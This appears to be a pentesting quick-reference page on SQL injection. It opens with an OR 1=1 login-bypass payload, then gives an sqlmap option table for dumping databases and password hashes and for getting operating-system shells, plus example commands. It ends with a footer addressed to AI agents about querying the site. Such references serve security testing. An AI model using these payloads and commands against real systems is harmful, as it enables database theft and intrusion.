# SQL Injection ``` execute("SELECT * FROM users WHERE username = 'admin' AND password = '' OR 1=1 --'") ```

## SQL Map ### Basic commands:
| Options | Description | | --------------------------- | ------------------------------------------------------------------ | | -u URL, --url=URL |

Target URL (e.g. "")

| |

--data=DATA

Data string to be sent through POST (e.g. "id=1")

| |

--random-agent

Use randomly selected HTTP User-Agent header value

| |

-p TESTPARAMETER

Testable parameter(s)

| |

--level=LEVEL

Level of tests to perform (1-5, default 1)

| |

--risk=RISK

Risk of tests to perform (1-3, default 1)

| ### Enumeration commands: *These options can be used to enumerate the back-end database management system information, structure, and data contained in tables.* |

Options

Description

| | ------------------------------- | ----------------------------------------------------- | | -a, --all |

Retrieve everything

| | -b, --banner |

Retrieve DBMS banner

| |

--current-user

| Retrieve DBMS current user | |

--current-db

Retrieve DBMS current database

| |

--passwords

Enumerate DBMS users password hashes

| |

--dbs

Enumerate DBMS databases

| |

--tables

Enumerate DBMS database tables

| |

--columns

Enumerate DBMS database table columns

| |

--schema

Enumerate DBMS schema

| |

--dump

Dump DBMS database table entries

| |

--dump-all

Dump all DBMS databases tables entries

| |

--is-dba

Detect if the DBMS current user is DBA

| |

-D \

DBMS database to enumerate

| |

-T \
|
DBMS database table(s) to enumerate
| |
-C COL
|
DBMS database table column(s) to enumerate
| ### Operating System access commands *These options can be used to access the back-end database management system on the target operating system.* |
Options
|
Description
| | ------------------------- | ---------------------------------------------------------------- | | --os-shell |
Prompt for an interactive operating system shell
| | --os-pwn |
Prompt for an OOB shell, Meterpreter or VNC
| |
--os-cmd=OSCMD
|
Execute an operating system command
| |
--priv-esc
|
Database process user privilege escalation
| |
--os-smbrelay
|
One-click prompt for an OOB shell, Meterpreter or VNC
| ### Examples
sqlmap -u https://testsite.com/page.php?id=7 --dbs \\Simple http sqlmap -r req.txt -p blood_group --dbs sqlmap -r <request_file> -p <vulnerable_parameter> --dbs Using GET based Method sqlmap -u https://testsite.com/page.php?id=7 -D blood --tables sqlmap -u https://testsite.com/page.php?id=7 -D <database_name> --tables Using POST based Method sqlmap -r req.txt -p blood_group -D blood --tables sqlmap -r req.txt -p <vulnerable_parameter> -D <database_name> --tables
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.cavementech.com/pentesting-quick-reference/web-pentesting/sql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.